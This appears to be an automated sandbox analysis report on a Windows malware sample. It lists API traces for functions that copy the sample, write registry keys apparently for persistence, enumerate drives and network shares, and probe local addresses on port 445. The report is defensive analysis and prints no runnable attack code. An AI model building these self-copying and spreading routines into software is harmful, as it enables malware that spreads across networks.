      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpenVersion
      • String ID:
      • API String ID: 4059737031-0
      • Opcode ID: 0741099982cb52e0a182ef06c581289042fddda8fcf5df57890c29a754a54e47
      • Instruction ID: edc88359a49c6b1cdc0c32f04f2989f64c58303d1b956811bfbff767a76fe914
      • Opcode Fuzzy Hash: 0741099982cb52e0a182ef06c581289042fddda8fcf5df57890c29a754a54e47
      • Instruction Fuzzy Hash: 3FF03C71900218FBDB119BE4DC19BEEB778FB06709F104065FA02E2090D7709F49DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA90A1 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
      Download Yara Rule
      APIs
      • GetProcessHeap.KERNEL32(00000000,00CA633F,00CA62A2,00000000,00000010,00000000,00000020,00CA633F,00000040,00CA2A6F,00CAB410), ref: 00CA90A7
      • RtlFreeHeap.NTDLL(00000000), ref: 00CA90AE
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcess
      • String ID:
      • API String ID: 3859560861-0
      • Opcode ID: 1c3ae6f35e1c2eb9867fe3e9b4067f7167df825d7cccd84d40db862720b8e0ac
      • Instruction ID: 56bab6c22b4d84e2bd7ec72f420899ae6fcf49d4e0b84b6c0c3ad7aaece90c37
      • Opcode Fuzzy Hash: 1c3ae6f35e1c2eb9867fe3e9b4067f7167df825d7cccd84d40db862720b8e0ac
      • Instruction Fuzzy Hash: 16B002B5544200FFDE515BE4DE0DB0D7A79AB45706F018444F34786160C7754410EB63
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA1236 Relevance: 15.3, APIs: 10, Instructions: 287fileregistryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 203 ca1236-ca12b7 call ca6347 call ca3bb3 * 3 call ca9041 * 6 224 ca12bd-ca12c0 203->224 225 ca1507-ca153e call ca39da * 7 203->225 224->225 227 ca12c6-ca12d1 call ca5b0e 224->227 252 ca1543-ca1566 call ca39da * 3 225->252 227->225 233 ca12d7-ca12da 227->233 233->225 235 ca12e0-ca12e3 233->235 235->225 237 ca12e9-ca12f4 call ca5b20 235->237 237->225 243 ca12fa-ca131b call ca59f1 237->243 243->225 249 ca1321-ca1325 243->249 249->225 251 ca132b-ca1339 call ca5b7c 249->251 251->225 257 ca133f-ca1343 251->257 257->225 259 ca1349-ca1357 call ca5b7c 257->259 259->225 265 ca135d-ca1372 call ca59f1 259->265 265->225 268 ca1378-ca1386 CopyFileW 265->268 269 ca138c-ca13b1 call ca90c6 RegOpenKeyExW 268->269 270 ca1461-ca1465 268->270 275 ca13ce 269->275 276 ca13b3-ca13bd call ca3a93 269->276 270->225 271 ca146b-ca147d call ca35d2 270->271 271->225 280 ca1483-ca1489 271->280 279 ca13d2-ca13f7 call ca90c6 RegOpenKeyExW 275->279 281 ca13c2-ca13cc 276->281 287 ca13f9-ca1403 call ca3a93 279->287 288 ca1411 279->288 283 ca14f1-ca14fc call ca35a4 280->283 281->279 289 ca148b-ca14a0 call ca59f1 283->289 290 ca14fe-ca1506 call ca90a1 283->290 295 ca1408-ca140f 287->295 292 ca1413-ca143c call ca59f1 288->292 300 ca14e8-ca14ee 289->300 301 ca14a2-ca14c3 CopyFileW call ca59f1 289->301 290->225 292->270 302 ca143e-ca1454 CopyFileW GetFileAttributesW 292->302 295->292 300->283 301->300 306 ca14c5-ca14db CopyFileW GetFileAttributesW 301->306 302->270 303 ca1456-ca145b SetFileAttributesW 302->303 303->270 306->300 307 ca14dd-ca14e2 SetFileAttributesW 306->307 307->300
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00CA5B3B,00000000,00000000,00000000,00CA37EB,00000000), ref: 00CA5B19
      • CopyFileW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CA137E
      • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020106,?), ref: 00CA13A9
      • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020106,?), ref: 00CA13EF
      • CopyFileW.KERNELBASE(?,00000000,00000001), ref: 00CA1444
      • GetFileAttributesW.KERNELBASE(00000000), ref: 00CA144B
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00CA145B
      • CopyFileW.KERNELBASE(?,00000000,00000001), ref: 00CA14A8
      • CopyFileW.KERNELBASE(?,00000000,00000001), ref: 00CA14CB
      • GetFileAttributesW.KERNELBASE(00000000), ref: 00CA14D2
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00CA14E2
        • Part of subcall function 00CA3A93: RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00CA1408,?,00000104,?,00CA1408,00000000,00000000), ref: 00CA3AA6
        • Part of subcall function 00CA3A93: RegCloseKey.ADVAPI32(?,?,00CA1408,00000000,00000000), ref: 00CA3AB2
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$AttributesCopy$HeapOpen$AllocateCloseModuleNameProcessValue
      • String ID:
      • API String ID: 2776276768-0
      • Opcode ID: 6753e262052bda9b219d400296275a2e5b994ba298abdc616a74820aef8f2f26
      • Instruction ID: 6243432f5013abe7bacd7783174d8e7d0c176ba365d68004d7846d9246418f76
      • Opcode Fuzzy Hash: 6753e262052bda9b219d400296275a2e5b994ba298abdc616a74820aef8f2f26
      • Instruction Fuzzy Hash: 0B918071D0020AAEDF116BB4EC46FEE7BB9EF4A319F244016F416B5091EB719E50EB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA1E10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205shareCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 308 ca1e10-ca1e4b call ca9041 * 2 313 ca206b-ca206f 308->313 314 ca1e51-ca1e53 308->314 317 ca207b-ca2083 313->317 318 ca2071-ca207a call ca90a1 313->318 315 ca1e59-ca1e6e WNetOpenEnumW 314->315 316 ca2064-ca206a call ca90a1 314->316 319 ca2054-ca2058 315->319 320 ca1e74-ca1e8b WNetEnumResourceW 315->320 316->313 318->317 319->316 326 ca205a-ca205e WNetCloseEnum 319->326 320->319 324 ca1e91 320->324 327 ca1e94-ca1e9e call ca5962 324->327 326->316 327->319 330 ca1ea4 327->330 331 ca2020-ca2024 330->331 332 ca202a-ca204e WNetEnumResourceW 331->332 333 ca1ea9-ca1eba 331->333 332->319 332->327 334 ca1f18-ca1f1c 333->334 335 ca1ebc-ca1ec1 333->335 336 ca201e 334->336 337 ca1f22-ca1f30 call ca90c6 334->337 335->336 338 ca1ec7-ca1ecc 335->338 336->331 337->336 346 ca1f36-ca1f56 call ca9216 337->346 340 ca1ece-ca1ed3 338->340 341 ca1ef5-ca1f0b call ca1e10 338->341 340->336 344 ca1ed9-ca1ede 340->344 345 ca1f10-ca1f13 341->345 344->336 347 ca1ee4-ca1eef call ca90dd 344->347 345->336 352 ca1f58-ca1f63 346->352 353 ca1f65-ca1f6c 346->353 347->336 347->341 354 ca1f95-ca1fad call ca927d call ca3711 352->354 355 ca1f71-ca1f77 353->355 354->336 364 ca1faf-ca1fe0 call ca35d2 call ca3c7a call ca1706 call ca5840 354->364 357 ca1f79-ca1f94 call ca8fd7 355->357 358 ca1f6e 355->358 357->354 358->355 373 ca1fe9-ca1fee 364->373 374 ca1fe2-ca1fe3 CloseHandle 364->374 373->336 375 ca1ff0-ca2015 call ca3c7a call ca1706 call ca5840 373->375 374->373 375->336 382 ca2017-ca2018 CloseHandle 375->382 382->336
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00CA1E66
      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00CA1E83
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
      • WNetEnumResourceW.MPR(?,?,?,?), ref: 00CA2046
      • WNetCloseEnum.MPR(?), ref: 00CA205E
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$CriticalHeapResourceSection$AllocateCloseEnterLeaveOpenProcess
      • String ID: \\?\UNC\\\e-
      • API String ID: 2652425650-4184602625
      • Opcode ID: ca2164e635fc049be315abd8d31f9159d205fe7d7153fc3f0c8797c8e01c0d60
      • Instruction ID: 45efae7eed2399f84bbe94f967122e5cf685aa0e96addd04a6acafa46a7c9bff
      • Opcode Fuzzy Hash: ca2164e635fc049be315abd8d31f9159d205fe7d7153fc3f0c8797c8e01c0d60
      • Instruction Fuzzy Hash: 6B61E072204303AFDB209F68DC45E6F7BE9EF86358F040918F865D21A2E731DA55DB52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA271B Relevance: 9.1, APIs: 6, Instructions: 134fileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 398 ca271b-ca2751 call ca9041 * 2 403 ca2836-ca2839 398->403 404 ca2757-ca2759 398->404 406 ca2844-ca2847 403->406 407 ca283b-ca2843 call ca90a1 403->407 405 ca275f-ca2768 call ca5b20 404->405 404->406 405->403 420 ca276e-ca2789 call ca59f1 405->420 410 ca2849-ca2851 call ca90a1 406->410 411 ca2852-ca2855 406->411 407->406 410->411 412 ca2860-ca2866 411->412 413 ca2857-ca285f call ca90a1 411->413 418 ca2868-ca2870 call ca90a1 412->418 419 ca2871-ca2875 412->419 413->412 418->419 420->403 427 ca278f-ca27a7 CreateFileW 420->427 427->403 428 ca27ad-ca27d7 SetFilePointer call ca9041 * 2 427->428 433 ca27d9-ca27db 428->433 434 ca282d-ca2830 CloseHandle 428->434 433->434 435 ca27dd-ca27e7 SetFilePointer 433->435 434->403 435->434 436 ca27e9-ca27fd ReadFile 435->436 436->434 437 ca27ff-ca2802 436->437 437->434 438 ca2804-ca282a MultiByteToWideChar call ca2504 437->438 438->434
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6), ref: 00CA279B
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA27B8
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA27E3
      • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA27F5
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000), ref: 00CA2813
      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00CA2AF6,00000000,?), ref: 00CA2830
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$HeapPointer$AllocateByteCharCloseCreateHandleMultiProcessReadWide
      • String ID:
      • API String ID: 660798709-0
      • Opcode ID: 45daee833316918187307fa49676aa2b16ddfa3bdb118f922851707f8cce4327
      • Instruction ID: 2663f8c95871d77e6619d776975abe301627301d0b5eddd6af7217aea0d02722
      • Opcode Fuzzy Hash: 45daee833316918187307fa49676aa2b16ddfa3bdb118f922851707f8cce4327
      • Instruction Fuzzy Hash: 4141B972D0022ABFDB215BA9DC85DAFBFB8EF96758F20012AF510A1091D7354F41DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA1A76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 455 ca1a76-ca1aae GetLogicalDrives call ca6347 call ca530c call ca3c7a 461 ca1ab3-ca1acc call ca3955 455->461 464 ca1b8a-ca1b90 461->464 465 ca1ad2-ca1ad6 461->465 466 ca1b92 call ca52de 464->466 467 ca1b97-ca1bbc call ca39da call ca3955 call ca90a1 464->467 465->467 468 ca1adc-ca1ae5 call ca90c6 465->468 466->467 474 ca1aeb-ca1af5 call ca5962 468->474 475 ca1b81-ca1b85 call ca542b 468->475 474->475 483 ca1afb-ca1b04 474->483 475->464 484 ca1b71-ca1b7b call ca90c6 483->484 485 ca1b06-ca1b34 call ca1706 call ca5840 483->485 484->474 484->475 492 ca1b3d-ca1b42 485->492 493 ca1b36-ca1b37 CloseHandle 485->493 492->484 494 ca1b44-ca1b68 call ca1706 call ca5840 492->494 493->492 494->484 499 ca1b6a-ca1b6b CloseHandle 494->499 499->484
      APIs
      • GetLogicalDrives.KERNEL32 ref: 00CA1A82
        • Part of subcall function 00CA530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00CA2195), ref: 00CA5327
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00CA2195), ref: 00CA5347
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00CA2195), ref: 00CA5352
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
        • Part of subcall function 00CA1706: htonl.WS2_32(?), ref: 00CA1774
        • Part of subcall function 00CA5840: CreateThread.KERNEL32(00000000,00000000,00CA56B3,00000000,00000000,00000000), ref: 00CA58F2
      • CloseHandle.KERNEL32(00000000), ref: 00CA1B37
      • CloseHandle.KERNEL32(00000000), ref: 00CA1B6B
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateCriticalSection$CloseEventHandle$CountDrivesEnterInformationInitializeLeaveLogicalSpinThreadVolumehtonl
      • String ID: \\?\X:
      • API String ID: 1738266806-1324186152
      • Opcode ID: 060d829b832ce30e65ee6ca7b992c795074e14043481078745fa57d28780c5a2
      • Instruction ID: ef4a8004d40be2a67c04efebf2a07ae122305dc651558c052ea60e4e72d952df
      • Opcode Fuzzy Hash: 060d829b832ce30e65ee6ca7b992c795074e14043481078745fa57d28780c5a2
      • Instruction Fuzzy Hash: 0131B6B2500707ABCB117F709C46A2FB7A8FF46768F044515FC5896162EB31DA11DBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA1CC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 500 ca1cc5-ca1cdb GetLogicalDrives call ca3c7a 502 ca1ce0-ca1d1e call ca6347 call ca530c call ca3955 500->502 509 ca1dd9-ca1ddf 502->509 510 ca1d24-ca1d28 502->510 512 ca1de6-ca1e0d call ca39da call ca3955 call ca90a1 509->512 513 ca1de1 call ca52de 509->513 511 ca1d2e 510->511 510->512 515 ca1dc9-ca1dd3 call ca5962 511->515 513->512 515->509 522 ca1d33-ca1d3f GetLogicalDrives 515->522 524 ca1dbe-ca1dc3 Sleep 522->524 525 ca1d41-ca1d45 522->525 524->515 527 ca1d49-ca1d52 525->527 528 ca1dad-ca1db1 527->528 529 ca1d54-ca1d89 call ca1706 call ca5840 527->529 528->527 530 ca1db3-ca1dbc call ca542b 528->530 529->528 537 ca1d8b-ca1daa call ca1706 call ca5840 529->537 530->524 537->528
      APIs
      • GetLogicalDrives.KERNELBASE ref: 00CA1CD1
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
        • Part of subcall function 00CA530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00CA2195), ref: 00CA5327
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00CA2195), ref: 00CA5347
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00CA2195), ref: 00CA5352
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
      • GetLogicalDrives.KERNEL32 ref: 00CA1D33
      • Sleep.KERNEL32(000003E8), ref: 00CA1DC3
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$CreateDrivesEventLogical$CountEnterInformationInitializeLeaveSleepSpinVolume
      • String ID: \\?\ :
      • API String ID: 2297414327-2836105686
      • Opcode ID: b33d963addcfb55da1e8af5c9c06e7ef4c70cd07334c06979588ff4464515277
      • Instruction ID: c75932cc00f193005bf25dedd0b2b96532c812c5d51731eeb9252ea82c7cb66d
      • Opcode Fuzzy Hash: b33d963addcfb55da1e8af5c9c06e7ef4c70cd07334c06979588ff4464515277
      • Instruction Fuzzy Hash: E9319F76904707AFC701EF60C88192FBBA5FF86358F040A29FC54962A1EB31DE54DB92
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4EA5 Relevance: 6.1, APIs: 4, Instructions: 83synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 542 ca4ea5-ca4f15 call ca3c7a call ca6347 call ca5a46 * 2 call ca5fe7 553 ca4f4d 542->553 554 ca4f17-ca4f28 OpenMutexW 542->554 557 ca4f4f-ca4f53 553->557 555 ca4f2a-ca4f37 CreateMutexW 554->555 556 ca4f39-ca4f49 WaitForSingleObject 554->556 555->556 558 ca4f60 555->558 559 ca4f4b 556->559 560 ca4f62-ca4f79 call ca39da * 2 556->560 557->560 561 ca4f55-ca4f5e CloseHandle 557->561 558->560 559->557 561->560
      APIs
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
      • OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F1E
      • CreateMutexW.KERNELBASE(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F2D
      • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00CA4F3C
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00CA4F56
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseCreateHandleInformationObjectOpenSingleVolumeWait
      • String ID:
      • API String ID: 1595014494-0
      • Opcode ID: a3ea1569fa1c12945a9bba95aba561073e8d452ee3d85a3d6bc81a82dd9d694a
      • Instruction ID: 767f50fc4b02c46f33732633d98a764bdefc428ab16407ac212cafd8db87dcaa
      • Opcode Fuzzy Hash: a3ea1569fa1c12945a9bba95aba561073e8d452ee3d85a3d6bc81a82dd9d694a
      • Instruction Fuzzy Hash: 5B21B2B5A0024AAFCB116FA1DC859ADBBF5FBC6358F204429F555A7200DB708D459B10
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA5230 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 566 ca5230-ca5256 call ca9041 569 ca5258-ca5267 GetIpAddrTable 566->569 570 ca52d7-ca52dd 566->570 571 ca5269-ca526f 569->571 572 ca52d0-ca52d6 call ca90a1 569->572 571->572 573 ca5271-ca5277 571->573 572->570 575 ca527a-ca5283 htonl 573->575 577 ca52c1-ca52ce 575->577 578 ca5285-ca52be htonl * 2 call ca5067 * 2 575->578 577->572 577->575 578->577
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00CA525F
      • htonl.WS2_32(00000004), ref: 00CA527C
      • htonl.WS2_32(00000004), ref: 00CA5287
      • htonl.WS2_32(?), ref: 00CA528E
        • Part of subcall function 00CA5067: htons.WS2_32(000001BD), ref: 00CA5085
        • Part of subcall function 00CA5067: htonl.WS2_32(00000000), ref: 00CA50DB
        • Part of subcall function 00CA5067: socket.WS2_32(00000002,00000001,00000006), ref: 00CA50EC
        • Part of subcall function 00CA5067: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00CA5102
        • Part of subcall function 00CA5067: connect.WS2_32(00000000,?,00000010), ref: 00CA5113
        • Part of subcall function 00CA5067: WSAGetLastError.WS2_32 ref: 00CA511D
        • Part of subcall function 00CA5067: getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 00CA517C
        • Part of subcall function 00CA5067: recv.WS2_32(?,?,00000001,00000002), ref: 00CA5195
        • Part of subcall function 00CA5067: WSAGetLastError.WS2_32 ref: 00CA51A2
        • Part of subcall function 00CA5067: getpeername.WS2_32(?,?,?), ref: 00CA51C9
        • Part of subcall function 00CA5067: closesocket.WS2_32(?), ref: 00CA51E3
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: htonl$ErrorHeapLast$AddrAllocateProcessTableclosesocketconnectgetpeernamegetsockopthtonsioctlsocketrecvsocket
      • String ID:
      • API String ID: 1827020252-0
      • Opcode ID: da58a1ecc10b9f6426e87ff24ec935c4a09f926d981e2d7f4e41feed42e9410e
      • Instruction ID: 76f1282326465e4782a21f4a465ed489574db51285f47ca23341ad8941ad2bea
      • Opcode Fuzzy Hash: da58a1ecc10b9f6426e87ff24ec935c4a09f926d981e2d7f4e41feed42e9410e
